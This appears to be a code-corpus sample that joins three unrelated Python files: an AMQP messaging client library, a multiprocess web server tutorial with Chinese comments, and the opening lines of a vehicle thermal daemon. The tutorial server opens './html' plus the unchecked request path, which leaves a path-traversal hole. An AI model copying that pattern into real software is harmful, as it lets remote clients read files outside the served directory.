self._session.destroy()
self._session = None
self._auth = auth
self._hostname = self._remote_address.hostname
self._connection.redirect(redirect, auth)
self._build_session()
def _build_session(self):
"""Build self._session based on current self.connection.
"""
# pylint: disable=protected-access
if not self._connection._cbs and isinstance(self._auth, authentication.CBSAuthMixin):
self._connection._cbs = self._auth.create_authenticator(
self._connection,
debug=self._debug_trace,
incoming_window=self._incoming_window,
outgoing_window=self._outgoing_window,
handle_max=self._handle_max,
on_attach=self._on_attach)
self._session = self._auth._session # pylint: disable=protected-access
elif self._connection._cbs:
self._session = self._auth._session # pylint: disable=protected-access
else:
self._session = self.session_type(
self._connection,
incoming_window=self._incoming_window,
outgoing_window=self._outgoing_window,
handle_max=self._handle_max,
on_attach=self._on_attach)
def open(self, connection=None):
"""Open the client. The client can create a new Connection
or an existing Connection can be passed in. This existing Connection
may have an existing CBS authentication Session, which will be
used for this client as well. Otherwise a new Session will be
created.
:param connection: An existing Connection that may be shared between
multiple clients.
:type connetion: ~uamqp.connection.Connection
"""
# pylint: disable=protected-access
if self._session:
return # already open.
_logger.debug("Opening client connection.")
try:
if connection:
_logger.debug("Using existing connection.")
self._auth = connection.auth
self._ext_connection = True
connection.lock()
self._connection = connection or self.connection_type(
self._hostname,
self._auth,
container_id=self._name,
max_frame_size=self._max_frame_size,
channel_max=self._channel_max,
idle_timeout=self._idle_timeout,
properties=self._properties,
remote_idle_timeout_empty_frame_send_ratio=self._remote_idle_timeout_empty_frame_send_ratio,
error_policy=self._error_policy,
debug=self._debug_trace,
encoding=self._encoding)
self._build_session()
if self._keep_alive_interval:
self._keep_alive_thread = threading.Thread(target=self._keep_alive)
self._keep_alive_thread.start()
finally:
if self._ext_connection:
connection.release()
def close(self):
"""Close the client. This includes closing the Session
and CBS authentication layer as well as the Connection.
If the client was opened using an external Connection,
this will be left intact.
No further messages can be sent or received and the client
cannot be re-opened.
All pending, unsent messages will remain uncleared to allow
them to be inspected and queued to a new client.
"""
if self.message_handler:
self.message_handler.destroy()
self.message_handler = None
self._shutdown = True
if self._keep_alive_thread:
self._keep_alive_thread.join()
self._keep_alive_thread = None
if not self._session:
return # already closed.
if not self._connection._cbs: # pylint: disable=protected-access
_logger.debug("Closing non-CBS session.")
self._session.destroy()
else:
_logger.debug("CBS session pending.")
self._session = None
if not self._ext_connection:
_logger.debug("Closing exclusive connection.")
self._connection.destroy()
else:
_logger.debug("Shared connection remaining open.")
self._connection = None
def mgmt_request(self, message, operation, op_type=None, node=None, callback=None, **kwargs):
"""Run a request/response operation. These are frequently used for management
tasks against a $management node, however any node name can be specified
and the available options will depend on the target service.
:param message: The message to send in the management request.
:type message: ~uamqp.message.Message
:param operation: The type of operation to be performed. This value will
be service-specific, but common values include READ, CREATE and UPDATE.
This value will be added as an application property on the message.
:type operation: bytes
:param op_type: The type on which to carry out the operation. This will
be specific to the entities of the service. This value will be added as
an application property on the message.
:type op_type: bytes
:param node: The target node. Default is `b"$management"`.
:type node: bytes
:param timeout: Provide an optional timeout in milliseconds within which a response
to the management request must be received.
:type timeout: float
:param callback: The function to process the returned parameters of the management
request including status code and a description if available. This can be used
to reformat the response or raise an error based on content. The function must
take 3 arguments - status code, response message and description.
:type callback: ~callable[int, bytes, ~uamqp.message.Message]
:param status_code_field: Provide an alternate name for the status code in the
response body which can vary between services due to the spec still being in draft.
The default is `b"statusCode"`.
:type status_code_field: bytes
:param description_fields: Provide an alternate name for the description in the
response body which can vary between services due to the spec still being in draft.
The default is `b"statusDescription"`.
:type description_fields: bytes
:rtype: ~uamqp.message.Message
"""
while not self.auth_complete():
time.sleep(0.05)
response = self._session.mgmt_request(
message,
operation,
op_type=op_type,
node=node,
callback=callback,
encoding=self._encoding,
debug=self._debug_trace,
**kwargs)
return response
def auth_complete(self):
"""Whether the authentication handshake is complete during
connection initialization.
:rtype: bool
"""
timeout = False
auth_in_progress = False
if self._connection._cbs: # pylint: disable=protected-access
timeout, auth_in_progress = self._auth.handle_token()
if timeout is None and auth_in_progress is None:
_logger.debug("No work done.")
return False
if timeout:
raise compat.TimeoutException("Authorization timeout.")
if auth_in_progress:
self._connection.work()
return False
return True
def client_ready(self):
"""
Whether the handler has completed all start up processes such as
establishing the connection, session, link and authentication, and
is not ready to process messages.
:rtype: bool
"""
if not self.auth_complete():
return False
if not self._client_ready():
self._connection.work()
return False
return True
def do_work(self):
"""Run a single connection iteration.
This will return `True` if the connection is still open
and ready to be used for further work, or `False` if it needs
to be shut down.
:rtype: bool
:raises: TimeoutError or ~uamqp.errors.ClientTimeout if CBS authentication timeout reached.
"""
if self._shutdown:
return False
if not self.client_ready():
return True
return self._client_run()
class SendClient(AMQPClient):
"""An AMQP client for sending messages.
:param target: The target AMQP service endpoint. This can either be the URI as
a string or a ~uamqp.address.Target object.
:type target: str, bytes or ~uamqp.address.Target
:param auth: Authentication for the connection. This should be one of the subclasses of
uamqp.authentication.AMQPAuth. Currently this includes:
- uamqp.authentication.SASLAnonymous
- uamqp.authentication.SASLPlain
- uamqp.authentication.SASTokenAuth
If no authentication is supplied, SASLAnnoymous will be used by default.
:type auth: ~uamqp.authentication.common.AMQPAuth
:param client_name: The name for the client, also known as the Container ID.
If no name is provided, a random GUID will be used.
:type client_name: str or bytes
:param debug: Whether to turn on network trace logs. If `True`, trace logs
will be logged at INFO level. Default is `False`.
:type debug: bool
:param msg_timeout: A timeout in milliseconds for messages from when they have been
added to the send queue to when the message is actually sent. This prevents potentially
expired data from being sent. If set to 0, messages will not expire. Default is 0.
:type msg_timeout: int
:param error_policy: A policy for parsing errors on link, connection and message
disposition to determine whether the error should be retryable.
:type error_policy: ~uamqp.errors.ErrorPolicy
:param keep_alive_interval: If set, a thread will be started to keep the connection
alive during periods of user inactivity. The value will determine how long the
thread will sleep (in seconds) between pinging the connection. If 0 or None, no
thread will be started.
:type keep_alive_interval: int
:param send_settle_mode: The mode by which to settle message send
operations. If set to `Unsettled`, the client will wait for a confirmation
from the service that the message was successfully sent. If set to 'Settled',
the client will not wait for confirmation and assume success.
:type send_settle_mode: ~uamqp.constants.SenderSettleMode
:param receive_settle_mode: The mode by which to settle message receive
operations. If set to `PeekLock`, the receiver will lock a message once received until
the client accepts or rejects the message. If set to `ReceiveAndDelete`, the service
will assume successful receipt of the message and clear it from the queue. The
default is `PeekLock`.
:type receive_settle_mode: ~uamqp.constants.ReceiverSettleMode
:param max_message_size: The maximum allowed message size negotiated for the Link.
:type max_message_size: int
:param link_properties: Metadata to be sent in the Link ATTACH frame.
:type link_properties: dict
:param link_credit: The sender Link credit that determines how many
messages the Link will attempt to handle per connection iteration.
:type link_credit: int
:param max_frame_size: Maximum AMQP frame size. Default is 63488 bytes.
:type max_frame_size: int
:param channel_max: Maximum number of Session channels in the Connection.
:type channel_max: int
:param idle_timeout: Timeout in milliseconds after which the Connection will close
if there is no further activity.
:type idle_timeout: int
:param properties: Connection properties.
:type properties: dict
:param remote_idle_timeout_empty_frame_send_ratio: Ratio of empty frames to
idle time for Connections with no activity. Value must be between
0.0 and 1.0 inclusive. Default is 0.5.
:type remote_idle_timeout_empty_frame_send_ratio: float
:param incoming_window: The size of the allowed window for incoming messages.
:type incoming_window: int
:param outgoing_window: The size of the allowed window for outgoing messages.
:type outgoing_window: int
:param handle_max: The maximum number of concurrent link handles.
:type handle_max: int
:param on_attach: A callback function to be run on receipt of an ATTACH frame.
The function must take 4 arguments: source, target, properties and error.
:type on_attach: func[~uamqp.address.Source, ~uamqp.address.Target, dict, ~uamqp.errors.AMQPConnectionError]
:param encoding: The encoding to use for parameters supplied as strings.
Default is 'UTF-8'
:type encoding: str
"""
def __init__(
self, target, auth=None, client_name=None, debug=False, msg_timeout=0,
error_policy=None, keep_alive_interval=None, **kwargs):
target = target if isinstance(target, address.Address) else address.Target(target)
self._msg_timeout = msg_timeout
self._pending_messages = []
self._waiting_messages = []
self._shutdown = None
# Sender and Link settings
self._max_message_size = kwargs.pop('max_message_size', None) or constants.MAX_MESSAGE_LENGTH_BYTES
self._link_properties = kwargs.pop('link_properties', None)
self._link_credit = kwargs.pop('link_credit', None)
# AMQP object settings
self.sender_type = sender.MessageSender
super(SendClient, self).__init__(
target,
auth=auth,
client_name=client_name,
debug=debug,
error_policy=error_policy,
keep_alive_interval=keep_alive_interval,
**kwargs)
def _client_ready(self):
"""Determine whether the client is ready to start sending messages.
To be ready, the connection must be open and authentication complete,
The Session, Link and MessageSender must be open and in non-errored
states.
:rtype: bool
:raises: ~uamqp.errors.MessageHandlerError if the MessageSender
goes into an error state.
"""
# pylint: disable=protected-access
if not self.message_handler:
self.message_handler = self.sender_type(
self._session, self._name, self._remote_address,
name='sender-link-{}'.format(uuid.uuid4()),
debug=self._debug_trace,
send_settle_mode=self._send_settle_mode,
receive_settle_mode=self._receive_settle_mode,
max_message_size=self._max_message_size,
link_credit=self._link_credit,
properties=self._link_properties,
error_policy=self._error_policy,
encoding=self._encoding)
self.message_handler.open()
return False
if self.message_handler.get_state() == constants.MessageSenderState.Error:
raise errors.MessageHandlerError(
"Message Sender Client is in an error state. "
"Please confirm credentials and access permissions."
"\nSee debug trace for more details.")
if self.message_handler.get_state() != constants.MessageSenderState.Open:
return False
return True
def _on_message_sent(self, message, result, delivery_state=None):
"""Callback run on a message send operation. If message
has a user defined callback, it will be called here. If the result
of the operation is failure, the message state will be reverted
to 'pending' up to the maximum retry count.
:param message: The message that was sent.
:type message: ~uamqp.message.Message
:param result: The result of the send operation.
:type result: int
:param error: An Exception if an error ocurred during the send operation.
:type error: ~Exception
"""
# pylint: disable=protected-access
try:
exception = delivery_state
result = constants.MessageSendResult(result)
if result == constants.MessageSendResult.Error:
if isinstance(delivery_state, Exception):
exception = errors.ClientMessageError(delivery_state, info=delivery_state)
exception.action = errors.ErrorAction(retry=True)
elif delivery_state:
error = errors.ErrorResponse(delivery_state)
exception = errors._process_send_error(
self._error_policy,
error.condition,
error.description,
error.info)
else:
exception = errors.MessageSendFailed(constants.ErrorCodes.UnknownError)
exception.action = errors.ErrorAction(retry=True)
if exception.action.retry == errors.ErrorAction.retry \
and message.retries < self._error_policy.max_retries:
if exception.action.increment_retries:
message.retries += 1
self._backoff = exception.action.backoff
_logger.debug("Message error, retrying. Attempts: %r, Error: %r", message.retries, exception)
message.state = constants.MessageState.WaitingToBeSent
return
if exception.action.retry == errors.ErrorAction.retry:
_logger.info("Message error, %r retries exhausted. Error: %r", message.retries, exception)
else:
_logger.info("Message error, not retrying. Error: %r", exception)
message.state = constants.MessageState.SendFailed
message._response = exception
else:
_logger.debug("Message sent: %r, %r", result, exception)
message.state = constants.MessageState.SendComplete
message._response = errors.MessageAlreadySettled()
if message.on_send_complete:
message.on_send_complete(result, exception)
except KeyboardInterrupt:
_logger.error("Received shutdown signal while processing message send completion.")
self.message_handler._error = errors.AMQPClientShutdown()
def _get_msg_timeout(self, message):
current_time = self._counter.get_current_ms()
elapsed_time = (current_time - message.idle_time)
if self._msg_timeout > 0 and elapsed_time > self._msg_timeout:
return None
return self._msg_timeout - elapsed_time if self._msg_timeout > 0 else 0
def _transfer_message(self, message, timeout):
sent = self.message_handler.send(message, self._on_message_sent, timeout=timeout)
if not sent:
_logger.info("Message not sent, raising RuntimeError.")
raise RuntimeError("Message sender failed to add message data to outgoing queue.")
def _filter_pending(self):
filtered = []
for message in self._pending_messages:
if message.state in constants.DONE_STATES:
continue
elif message.state == constants.MessageState.WaitingForSendAck:
self._waiting_messages += 1
elif message.state == constants.MessageState.WaitingToBeSent:
message.state = constants.MessageState.WaitingForSendAck
try:
timeout = self._get_msg_timeout(message)
if timeout is None:
self._on_message_sent(message, constants.MessageSendResult.Timeout)
if message.state != constants.MessageState.WaitingToBeSent:
continue
else:
self._transfer_message(message, timeout)
except Exception as exp: # pylint: disable=broad-except
self._on_message_sent(message, constants.MessageSendResult.Error, delivery_state=exp)
if message.state != constants.MessageState.WaitingToBeSent:
continue
filtered.append(message)
return filtered
def _client_run(self):
"""MessageSender Link is now open - perform message send
on all pending messages.
Will return True if operation successful and client can remain open for
further work.
:rtype: bool
"""
# pylint: disable=protected-access
self.message_handler.work()
self._waiting_messages = 0
self._pending_messages = self._filter_pending()
if self._backoff and not self._waiting_messages:
_logger.info("Client told to backoff - sleeping for %r seconds", self._backoff)
self._connection.sleep(self._backoff)
self._backoff = 0
self._connection.work()
return True
@property
def _message_sender(self):
"""Temporary property to support backwards compatibility
with EventHubs.
"""
return self.message_handler
@property
def pending_messages(self):
return [m for m in self._pending_messages if m.state in constants.PENDING_STATES]
def redirect(self, redirect, auth):
"""Redirect the client endpoint using a Link DETACH redirect
response.
:param redirect: The Link DETACH redirect details.
:type redirect: ~uamqp.errors.LinkRedirect
:param auth: Authentication credentials to the redirected endpoint.
:type auth: ~uamqp.authentication.common.AMQPAuth
"""
if self._ext_connection:
raise ValueError(
"Clients with a shared connection cannot be "
"automatically redirected.")
if self.message_handler:
self.message_handler.destroy()
self.message_handler = None
self._pending_messages = []
self._remote_address = address.Target(redirect.address)
self._redirect(redirect, auth)
def queue_message(self, *messages):
"""Add one or more messages to the send queue.
No further action will be taken until either `SendClient.wait()`
or `SendClient.send_all_messages()` has been called.
The client does not need to be open yet for messages to be added
to the queue. Multiple messages can be queued at once:
- `send_client.queue_message(my_message)`
- `send_client.queue_message(message_1, message_2, message_3)`
- `send_client.queue_message(*my_message_list)`
:param messages: A message to send. This can either be a single instance
of `Message`, or multiple messages wrapped in an instance of `BatchMessage`.
:type message: ~uamqp.message.Message
"""
for message in messages:
for internal_message in message.gather():
internal_message.idle_time = self._counter.get_current_ms()
internal_message.state = constants.MessageState.WaitingToBeSent
self._pending_messages.append(internal_message)
def send_message(self, messages, close_on_done=False):
"""Send a single message or batched message.
:param messages: A message to send. This can either be a single instance
of `Message`, or multiple messages wrapped in an instance of `BatchMessage`.
:type message: ~uamqp.message.Message
:param close_on_done: Close the client once the message is sent. Default is `False`.
:type close_on_done: bool
:raises: ~uamqp.errors.MessageException if message fails to send after retry policy
is exhausted.
"""
batch = messages.gather()
pending_batch = []
for message in batch:
message.idle_time = self._counter.get_current_ms()
self._pending_messages.append(message)
pending_batch.append(message)
self.open()
running = True
try:
while running and any([m for m in pending_batch if m.state not in constants.DONE_STATES]):
running = self.do_work()
failed = [m for m in pending_batch if m.state == constants.MessageState.SendFailed]
if any(failed):
details = {"total_messages": len(pending_batch), "number_failed": len(failed)}
details['failed_messages'] = {}
exception = None
for failed_message in failed:
exception = failed_message._response # pylint: disable=protected-access
details['failed_messages'][failed_message] = exception
raise errors.ClientMessageError(exception, info=details)
finally:
if close_on_done or not running:
self.close()
def messages_pending(self):
"""Check whether the client is holding any unsent
messages in the queue.
:rtype: bool
"""
return bool(self._pending_messages)
def wait(self):
"""Run the client until all pending message in the queue
have been processed. Returns whether the client is still running after the
messages have been processed, or whether a shutdown has been initiated.
:rtype: bool
"""
running = True
while running and self.messages_pending():
running = self.do_work()
return running
def send_all_messages(self, close_on_done=True):
"""Send all pending messages in the queue. This will return a list
of the send result of all the pending messages so it can be
determined if any messages failed to send.
This function will open the client if it is not already open.
:param close_on_done: Close the client once the messages are sent.
Default is `True`.
:type close_on_done: bool
:rtype: list[~uamqp.constants.MessageState]
"""
self.open()
running = True
try:
messages = self._pending_messages[:]
running = self.wait()
results = [m.state for m in messages]
return results
finally:
if close_on_done or not running:
self.close()
class ReceiveClient(AMQPClient):
"""An AMQP client for receiving messages.
:param target: The source AMQP service endpoint. This can either be the URI as
a string or a ~uamqp.address.Source object.
:type target: str, bytes or ~uamqp.address.Source
:param auth: Authentication for the connection. This should be one of the subclasses of
uamqp.authentication.AMQPAuth. Currently this includes:
- uamqp.authentication.SASLAnonymous
- uamqp.authentication.SASLPlain
- uamqp.authentication.SASTokenAuth
If no authentication is supplied, SASLAnnoymous will be used by default.
:type auth: ~uamqp.authentication.common.AMQPAuth
:param client_name: The name for the client, also known as the Container ID.
If no name is provided, a random GUID will be used.
:type client_name: str or bytes
:param debug: Whether to turn on network trace logs. If `True`, trace logs
will be logged at INFO level. Default is `False`.
:type debug: bool
:param timeout: A timeout in milliseconds. The receiver will shut down if no
new messages are received after the specified timeout. If set to 0, the receiver
will never timeout and will continue to listen. The default is 0.
Set `shutdown_after_timeout` to `False` if keeping the receiver open after timeout is needed.
:type timeout: float
:param shutdown_after_timeout: Whether to automatically shutdown the receiver
if no new messages are received after the specified timeout. Default is `True`.
:type shutdown_after_timeout: bool
:param auto_complete: Whether to automatically settle message received via callback
or via iterator. If the message has not been explicitly settled after processing
the message will be accepted. Alternatively, when used with batch receive, this setting
will determine whether the messages are pre-emptively settled during batching, or otherwise
let to the user to be explicitly settled.
:type auto_complete: bool
:param error_policy: A policy for parsing errors on link, connection and message
disposition to determine whether the error should be retryable.
:type error_policy: ~uamqp.errors.ErrorPolicy
:param keep_alive_interval: If set, a thread will be started to keep the connection
alive during periods of user inactivity. The value will determine how long the
thread will sleep (in seconds) between pinging the connection. If 0 or None, no
thread will be started.
:type keep_alive_interval: int
:param send_settle_mode: The mode by which to settle message send
operations. If set to `Unsettled`, the client will wait for a confirmation
from the service that the message was successfully sent. If set to 'Settled',
the client will not wait for confirmation and assume success.
:type send_settle_mode: ~uamqp.constants.SenderSettleMode
:param receive_settle_mode: The mode by which to settle message receive
operations. If set to `PeekLock`, the receiver will lock a message once received until
the client accepts or rejects the message. If set to `ReceiveAndDelete`, the service
will assume successful receipt of the message and clear it from the queue. The
default is `PeekLock`.
:type receive_settle_mode: ~uamqp.constants.ReceiverSettleMode
:param desired_capabilities: The extension capabilities desired from the peer endpoint.
To create an desired_capabilities object, please do as follows:
- 1. Create an array of desired capability symbols: `capabilities_symbol_array = [types.AMQPSymbol(string)]`
- 2. Transform the array to AMQPValue object: `utils.data_factory(types.AMQPArray(capabilities_symbol_array))`
:type desired_capabilities: ~uamqp.c_uamqp.AMQPValue
:param max_message_size: The maximum allowed message size negotiated for the Link.
:type max_message_size: int
:param link_properties: Metadata to be sent in the Link ATTACH frame.
:type link_properties: dict
:param prefetch: The receiver Link credit that determines how many
messages the Link will attempt to handle per connection iteration.
The default is 300.
:type prefetch: int
:param max_frame_size: Maximum AMQP frame size. Default is 63488 bytes.
:type max_frame_size: int
:param channel_max: Maximum number of Session channels in the Connection.
:type channel_max: int
:param idle_timeout: Timeout in milliseconds after which the Connection will close
if there is no further activity.
:type idle_timeout: int
:param properties: Connection properties.
:type properties: dict
:param remote_idle_timeout_empty_frame_send_ratio: Ratio of empty frames to
idle time for Connections with no activity. Value must be between
0.0 and 1.0 inclusive. Default is 0.5.
:type remote_idle_timeout_empty_frame_send_ratio: float
:param incoming_window: The size of the allowed window for incoming messages.
:type incoming_window: int
:param outgoing_window: The size of the allowed window for outgoing messages.
:type outgoing_window: int
:param handle_max: The maximum number of concurrent link handles.
:type handle_max: int
:param on_attach: A callback function to be run on receipt of an ATTACH frame.
The function must take 4 arguments: source, target, properties and error.
:type on_attach: func[~uamqp.address.Source, ~uamqp.address.Target, dict, ~uamqp.errors.AMQPConnectionError]
:param encoding: The encoding to use for parameters supplied as strings.
Default is 'UTF-8'
:type encoding: str
"""
def __init__(
self, source, auth=None, client_name=None, debug=False, timeout=0,
auto_complete=True, error_policy=None, **kwargs):
source = source if isinstance(source, address.Address) else address.Source(source)
self._timeout = timeout
self._last_activity_timestamp = None
self._was_message_received = False
self._message_received_callback = None
self._streaming_receive = False
self._received_messages = compat.queue.Queue()
self._shutdown_after_timeout = kwargs.pop('shutdown_after_timeout', True)
self._timeout_reached = False
# Receiver and Link settings
self._max_message_size = kwargs.pop('max_message_size', None) or constants.MAX_MESSAGE_LENGTH_BYTES
self._prefetch = kwargs.pop('prefetch', None) or 300
self._link_properties = kwargs.pop('link_properties', None)
# AMQP object settings
self.receiver_type = receiver.MessageReceiver
self.auto_complete = auto_complete
super(ReceiveClient, self).__init__(
source, auth=auth, client_name=client_name, error_policy=error_policy, debug=debug, **kwargs)
@property
def _message_receiver(self):
"""Temporary property to support backwards compatibility
with EventHubs.
"""
return self.message_handler
def _client_ready(self):
"""Determine whether the client is ready to start receiving messages.
To be ready, the connection must be open and authentication complete,
The Session, Link and MessageReceiver must be open and in non-errored
states.
:rtype: bool
:raises: ~uamqp.errors.MessageHandlerError if the MessageReceiver
goes into an error state.
"""
# pylint: disable=protected-access
if not self.message_handler:
self.message_handler = self.receiver_type(
self._session, self._remote_address, self._name,
on_message_received=self._message_received,
name='receiver-link-{}'.format(uuid.uuid4()),
debug=self._debug_trace,
receive_settle_mode=self._receive_settle_mode,
send_settle_mode=self._send_settle_mode,
prefetch=self._prefetch,
max_message_size=self._max_message_size,
properties=self._link_properties,
error_policy=self._error_policy,
encoding=self._encoding,
desired_capabilities=self._desired_capabilities)
self.message_handler.open()
return False
if self.message_handler.get_state() == constants.MessageReceiverState.Error:
raise errors.MessageHandlerError(
"Message Receiver Client is in an error state. "
"Please confirm credentials and access permissions."
"\nSee debug trace for more details.")
if self.message_handler.get_state() != constants.MessageReceiverState.Open:
self._last_activity_timestamp = self._counter.get_current_ms()
return False
return True
def _client_run(self):
"""MessageReceiver Link is now open - start receiving messages.
Will return True if operation successful and client can remain open for
further work.
:rtype: bool
"""
self.message_handler.work()
self._connection.work()
now = self._counter.get_current_ms()
if self._last_activity_timestamp and not self._was_message_received:
# If no messages are coming through, back off a little to keep CPU use low.
time.sleep(0.05)
if self._timeout > 0:
timespan = now - self._last_activity_timestamp
if timespan >= self._timeout:
self._timeout_reached = True
if self._shutdown_after_timeout:
_logger.info("Timeout reached, closing receiver.")
self._shutdown = True
else:
self._last_activity_timestamp = None # To reuse the receiver, reset the timestamp
_logger.info("Timeout reached, keeping receiver open.")
else:
self._last_activity_timestamp = now
self._was_message_received = False
return True
def _complete_message(self, message, auto): # pylint: disable=no-self-use
if not message or not auto:
return
message.accept()
def _message_generator(self):
"""Iterate over processed messages in the receive queue.
:rtype: generator[~uamqp.message.Message]
"""
self.open()
auto_complete = self.auto_complete
self.auto_complete = False
self._timeout_reached = False
self._last_activity_timestamp = None
receiving = True
message = None
try:
while receiving and not self._timeout_reached:
while receiving and self._received_messages.empty() and not self._timeout_reached:
receiving = self.do_work()
while not self._received_messages.empty():
message = self._received_messages.get()
self._received_messages.task_done()
yield message
self._complete_message(message, auto_complete)
finally:
self._complete_message(message, auto_complete)
self.auto_complete = auto_complete
if self._shutdown_after_timeout:
self.close()
def _message_received(self, message):
"""Callback run on receipt of every message. If there is
a user-defined callback, this will be called.
Additionally if the client is retrieving messages for a batch
or iterator, the message will be added to an internal queue.
:param message: Received message.
:type message: ~uamqp.message.Message
"""
self._was_message_received = True
if self._message_received_callback:
self._message_received_callback(message)
self._complete_message(message, self.auto_complete)
if not self._streaming_receive:
self._received_messages.put(message)
elif not message.settled:
# Message was received with callback processing and wasn't settled.
_logger.info("Message was not settled.")
def receive_message_batch(self, max_batch_size=None, on_message_received=None, timeout=0):
"""Receive a batch of messages. Messages returned in the batch have already been
accepted - if you wish to add logic to accept or reject messages based on custom
criteria, pass in a callback. This method will return as soon as some messages are
available rather than waiting to achieve a specific batch size, and therefore the
number of messages returned per call will vary up to the maximum allowed.
If the receive client is configured with `auto_complete=True` then the messages received
in the batch returned by this function will already be settled. Alternatively, if
`auto_complete=False`, then each message will need to be explicitly settled before
it expires and is released.
:param max_batch_size: The maximum number of messages that can be returned in
one call. This value cannot be larger than the prefetch value, and if not specified,
the prefetch value will be used.
:type max_batch_size: int
:param on_message_received: A callback to process messages as they arrive from the
service. It takes a single argument, a ~uamqp.message.Message object.
:type on_message_received: callable[~uamqp.message.Message]
:param timeout: I timeout in milliseconds for which to wait to receive any messages.
If no messages are received in this time, an empty list will be returned. If set to
0, the client will continue to wait until at least one message is received. The
default is 0.
:type timeout: float
"""
self._message_received_callback = on_message_received
max_batch_size = max_batch_size or self._prefetch
if max_batch_size > self._prefetch:
raise ValueError(
'Maximum batch size cannot be greater than the '
'connection link credit: {}'.format(self._prefetch))
timeout = self._counter.get_current_ms() + timeout if timeout else 0
expired = False
self.open()
receiving = True
batch = []
while not self._received_messages.empty() and len(batch) < max_batch_size:
batch.append(self._received_messages.get())
self._received_messages.task_done()
if len(batch) >= max_batch_size:
return batch
self._timeout_reached = False
self._last_activity_timestamp = None
while receiving and not expired and len(batch) < max_batch_size and not self._timeout_reached:
while receiving and self._received_messages.qsize() < max_batch_size and not self._timeout_reached:
if timeout and self._counter.get_current_ms() > timeout:
expired = True
break
before = self._received_messages.qsize()
receiving = self.do_work()
received = self._received_messages.qsize() - before
if self._received_messages.qsize() > 0 and received == 0:
# No new messages arrived, but we have some - so return what we have.
expired = True
break
while not self._received_messages.empty() and len(batch) < max_batch_size:
batch.append(self._received_messages.get())
self._received_messages.task_done()
return batch
def receive_messages(self, on_message_received):
"""Receive messages. This function will run indefinitely, until the client
closes either via timeout, error or forced interruption (e.g. keyboard interrupt).
If the receive client is configured with `auto_complete=True` then the messages that
have not been settled on completion of the provided callback will automatically be
accepted provided it has not expired. If an error occurs or the message has expired
it will be released. Alternatively if `auto_complete=False`, each message will need
to be explicitly settled during the callback, otherwise it will be released.
:param on_message_received: A callback to process messages as they arrive from the
service. It takes a single argument, a ~uamqp.message.Message object.
:type on_message_received: callable[~uamqp.message.Message]
"""
self._streaming_receive = True
self.open()
self._message_received_callback = on_message_received
self._timeout_reached = False
self._last_activity_timestamp = None
receiving = True
try:
while receiving and not self._timeout_reached:
receiving = self.do_work()
receiving = False
except:
receiving = False
raise
finally:
self._streaming_receive = False
if not receiving and self._shutdown_after_timeout:
self.close()
def receive_messages_iter(self, on_message_received=None):
"""Receive messages by generator. Messages returned in the generator have already been
accepted - if you wish to add logic to accept or reject messages based on custom
criteria, pass in a callback.
:param on_message_received: A callback to process messages as they arrive from the
service. It takes a single argument, a ~uamqp.message.Message object.
:type on_message_received: callable[~uamqp.message.Message]
"""
self._message_received_callback = on_message_received
return self._message_generator()
def redirect(self, redirect, auth):
"""Redirect the client endpoint using a Link DETACH redirect
response.
:param redirect: The Link DETACH redirect details.
:type redirect: ~uamqp.errors.LinkRedirect
:param auth: Authentication credentials to the redirected endpoint.
:type auth: ~uamqp.authentication.common.AMQPAuth
"""
if self._ext_connection:
raise ValueError(
"Clients with a shared connection cannot be "
"automatically redirected.")
if self.message_handler:
self.message_handler.destroy()
self.message_handler = None
self._shutdown = False
self._last_activity_timestamp = None
self._was_message_received = False
self._received_messages = compat.queue.Queue()
self._remote_address = address.Source(redirect.address)
self._redirect(redirect, auth)
|
multiprocess_web_server.py
|
#!/usr/bin/python3
# file: multiprocess_web_server.py
# Created by Guang at 19-7-19
# description:
# *-* coding:utf8 *-*
import multiprocessing
import socket
import re
def service_client(new_socket):
"""为这个客户端返回数据"""
# 1.接收浏览器发送过来的请求, 即HTTP请求
# GET / HTTP/1.1
request = new_socket.recv(1024).decode('utf-8')
# print("-" * 100)
# print(request)
request_lines = request.splitlines() # 当客户端主动关闭, 会收到空字符串并解阻塞; 这里会生成空列表
if not request_lines:
return
# print(request_lines)
# GET /index.html HTTP/1.1
# GET POST DELETE
file_name = ""
ret = re.match(r'[^/]+(/[^ ]*)', request_lines[0])
if ret:
file_name = ret.group(1)
print("*" * 50, file_name)
if file_name == "/":
file_name = "/index.html"
# 2.返回HTTP格式的数据
try:
print("./html" + file_name)
f = open("./html" + file_name, 'rb')
except Exception as e:
response = "HTTP/1.1 404 NOT FOUND\r\n"
response += "\r\n"
response += "----------file not found --------"
new_socket.send(response.encode("utf-8"))
else:
html_content = f.read()
f.close()
# 2.1 准备发送给浏览器的数据 -- header
response = "HTTP/1.1 200 OK\r\n"
response += "\r\n"
# 2.2 准备发送给浏览器的数据 -- body
# response += “哈哈哈哈”
# 将response header 发送给浏览器
new_socket.send(response.encode("utf-8"))
# 将response body 发送给服务器
new_socket.send(html_content)
# 这里必须再关闭一次, 底层:文件描述符
new_socket.close()
def main():
"""主函数: 整体控制"""
# 1.创建套接字
listen_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listen_server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# 2.绑定ip和port
local_addr = ("", 8888)
listen_server.bind(local_addr)
# 3.主动变被动, 并制定队列的长度
listen_server.listen(128)
while True:
# 4.等待新客户端的连接
new_socket, client_addr = listen_server.accept()
# 5.为这个客户端服务
p = multiprocessing.Process(target=service_client, args=(new_socket, ))
p.start()
# 进程类实现的并发服务器,必须要在这里也new_socket.close一次; 原因:文件描述符 fd
# 子进程已经复制了父进程的套接字等资源,所以父进程调用close不会将他们对应的这个链接关闭的
new_socket.close()
# 关闭监听套接字
listen_server.close()
if __name__ == '__main__':
main()
|
thermald.py
|
#!/usr/bin/env python3
import datetime
import os
import queue
import threading
import time
from collections import OrderedDict, namedtuple
from pathlib import Path
from typing import Dict, Optional, Tuple
import psutil
import cereal.messaging as messaging
from cereal import log
from common.dict_helpers import strip_deprecated_keys
from common.filter_simple import FirstOrderFilter
from common.params import Params
from common.realtime import DT_TRML, sec_since_boot
from selfdrive.controls.lib.alertmanager import set_offroad_alert
from selfdrive.hardware import EON, HARDWARE, PC, TICI
from selfdrive.loggerd.config import get_available_percent
from selfdrive.statsd import statlog
from selfdrive.swaglog import cloudlog
from selfdrive.thermald.power_monitoring import PowerMonitoring
from selfdrive.thermald.fan_controller import EonFanController, UnoFanController, TiciFanController
from selfdrive.version import terms_version, training_version
ThermalStatus = log.DeviceState.ThermalStatus
NetworkType = log.DeviceState.NetworkType
NetworkStrength = log.DeviceState.NetworkStrength
CURRENT_TAU = 15. # 15s time constant
TEMP_TAU = 5. # 5s time constant
DISCONNECT_TIMEOUT = 5. # wait 5 seconds before going offroad after disconnect so you get an alert
